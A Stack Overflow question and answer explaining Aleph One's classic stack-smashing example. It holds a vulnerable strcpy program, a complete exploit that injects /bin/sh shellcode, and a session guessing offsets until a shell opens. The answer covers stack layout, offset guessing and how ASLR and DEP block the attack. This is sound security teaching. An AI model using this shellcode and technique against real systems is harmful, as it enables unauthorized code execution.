# Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

Tags: c, stack-overflow, reverse-engineering, buffer-overflow, shellcode

I'm looking at [aleph's article on phrack magazine](http://phrack.org/issues/49/14.html). The code below can also be found there.

We have a vulnerable executable which it's code is:

**vulnerable.c**

```
void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}
```

Now, since we don't really know, when trying to attack that executable (by overflowing `buffer`), what is the address of `buffer`. We need to know it's address because we want to override the `ret` to point to the beginning of `buffer` (in which we put our shellcode).

The guessing procedure that is described in the article is as follows:

> We can create a program that takes as a parameter a buffer size, and
>   an offset from its own stack pointer (where we believe the buffer we
>   want to overflow may live).  We'll put the overflow string in an
>   environment variable so it is easy to manipulate:

**exploit2.c**

```
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] = //this shellcode merely opens a shell
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
```

> Now we can try to guess what the buffer and offset should be:

```
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
```

I don't understand what does the writer meant to present, in `explot2.c` we guess the size of the buffer in `vulnerable.c` and it's offset from the stack pointer.

- Why do we apply this offset on the stack pointer of `exploit2`?
- How does this effect `vulnerable`?
- What's the purpose of `exploit2.c` except from building the `EGG` environment variable?
- Why do we call `system("/bin/bash");` at the end?
- What's going on between `vulnerable` and `exploit2` in general?

Answer (score 1, accepted):

The only purpose of `exploit2` is building the egg variable, which needs to be passed as a parameter to `vulnerable`. It could be modified so to call `vulnerable` on its own.

The `shellcode` variable contains machine code for a function that invokes a shell. The goal is to copy this code into the `buffer` variable of `vulnerable`, and then overwrite the return address of the `main` function of `vulnerable` to point to the entry point of the shell code, that is, the address of the variable `buffer`. The stack grows downward: the stack pointer register (`esp` in 32-bit x86 architecture) contains the smallest address used by local variables of the current function, at higher addresses we find other local variables, then the return address of the currently executing function, then the variables of the callee and so on. An overflow write on a variable, such as `buffer` in `vulnerable`, would overwrite whatever follows `buffer` in memory, in this case the return address of `main` since `buffer` is a local variable of the `main` function.

Now that we know what to do, we need some information:

- the address of the `buffer` variable, let's call it `bp`
- the address of the return address of the `main` function, let's call it `ra`

If we had this information we could forge an exploit string `EGG` such that:

- its length is `ra - bp + sizeof(void*)` in order to overflow the string `buffer` enough to overwrite the return address (`sizeof (void*` is the size of the return address)
- it contains the exploit code to be executed at the beginning, and the address `bp` at the end

Note that we only need a rough guess for the length of the string because we can just make the string longer and keep repeating the address `bp` all over it, but we need to compute the exact `bp` address if we want the shellcode to be executed properly.

We start by guessing the string length needed to overwrite the return value: 600 is enough, because it triggers an `Illegal instruction` error. Once we find it, we can look for the `bp` address.

We know that `bp` is around the bottom of the stack, because that's where the local variables are stored. We assume that the address for the stack are the same in `vulnerable` and `exploit2`, we measure the stack address in `exploit2` and start poking around changing `offset`. Once we get the right offset (the one which result in `addr` being equal to the target `bp`) the shell code will be executed when the control flow return from the `main` function of `vulnerable`.

If you want to test this code, remember that this does not work in modern machines because of the execution prevention technology which is used by operating system to marks pages containing data as not executable.

Comment: 1. I can test it by opening a shell with `setarch 'uname -m' -R /bin/bash` to disable ASLR and by making the data segment of vulnerable executable to disable DEP (there are tools to enable it).  2. Do you have an idea what's the purpose of the last line `system("/bin/bash");`? why do we need to run vulnerable within the shell opened by exploit?

Comment: 2. This is because `putenv` modifies the environment of the current process and the children processes (in this case, the one opened by `system`), so you need to run `vulnerable` there in order to have the `EGG` variable defined. You could also have `exploit` print the string and copy paste it manually, but you would have to take care of the escaping

Comment: 4. This attack assumes that ASLR is NOT deployed. Now is this guessing procedure relevant when `vulnerable` is running on my machine? (I think it's not since in that case I could debug it and see exactly what's the address of `buffer`). What's the scenario? maybe I'm a user (not admin) in a machine in which `vulnerable` is running by the admin? or maybe I'm trying to attack a process on the server?

Comment: As you guess, ASLR will make it harder to guess the stack address, as it is specifically designed to make this kind of attacks harder. In the scenario where you can disassemble the `vulnerable` binary you can get a better guess for the address in the stack than you'd do with a guess hoping it is the same as your program. When the binary is not available (i.e. a remote service) guessing is your only option.

Comment: Keep in mind that while in this example the input string comes from the command line, it could in theory be originated from any input, such as `readln` on standard input or a request string in a webserver